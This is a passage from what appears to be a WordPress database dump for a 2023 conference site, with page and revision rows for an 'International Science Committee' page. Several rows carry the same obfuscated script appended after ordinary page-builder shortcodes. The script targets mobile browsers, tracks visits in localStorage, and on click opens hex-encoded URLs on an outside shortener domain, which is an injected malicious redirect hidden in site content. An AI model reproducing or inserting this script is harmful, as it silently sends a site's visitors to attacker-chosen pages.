Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','International Science Committee','','publish','closed','closed','','isc','','','2023-03-01 23:11:58','2023-03-01 23:11:58','',0,'https://gsw2023.com/?page_id=2876',40,'page','',0),
(2877,1,'2022-10-17 09:50:28','2022-10-17 09:50:28',' ','','','publish','closed','closed','','2877','','','2022-10-17 09:50:28','2022-10-17 09:50:28','',0,'https://gsw2023.com/index.php/2022/10/17/2877/',23,'nav_menu_item','',0),
(2878,1,'2022-10-17 09:51:43','2022-10-17 09:51:43','<p>[vc_row][vc_column][dt_portfolio_masonry mode=\"grid\" content_alignment=\"center\" custom_content_bg_color=\"#f7f7f7\" post_content_paddings=\"20px 30px 30px 30px\" resized_image_dimensions=\"3x2\" image_border_radius=\"0px\" image_paddings=\"20px 20px 0px 20px\" post_title_font_size=\"22px\" post_title_line_height=\"32px\" post_date=\"n\" post_author=\"n\" post_comments=\"n\" post_content=\"off\" read_more_button=\"default_button\" read_more_button_text=\"Details\" project_icon_border_width=\"0px\" project_icon_color=\"#ffffff\" project_icon_color_hover=\"#ffffff\" loading_mode=\"js_more\" jsm_posts_per_page=\"6\" show_categories_filter=\"y\" category=\"\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','International Science Committee','','inherit','closed','closed','','2876-revision-v1','','','2022-10-17 09:51:43','2022-10-17 09:51:43','',2876,'https://gsw2023.com/?p=2878',0,'revision','',0),
(2879,1,'2023-02-04 07:08:40','2023-02-04 07:08:40','<p>[vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"100px\" image_paddings=\"15px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"35, 36, 37, 38, 40, 41, 42, 45, 46, 47, 48, 49, 50, 51, 53, 43, 44, 52, 54, 55, 56, 57, 58, 59, 60, 61, 63, 64, 65, 62, 67\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','International Science Committee','','inherit','closed','closed','','2876-autosave-v1','','','2023-02-04 07:08:40','2023-02-04 07:08:40','',2876,'https://gsw2023.com/?p=2879',0,'revision','',0),
(2880,1,'2022-10-19 03:53:33','2022-10-19 03:53:33','<p>[vc_row][vc_column][dt_team_masonry post_type=\"posts\" order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" posts=\"\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const 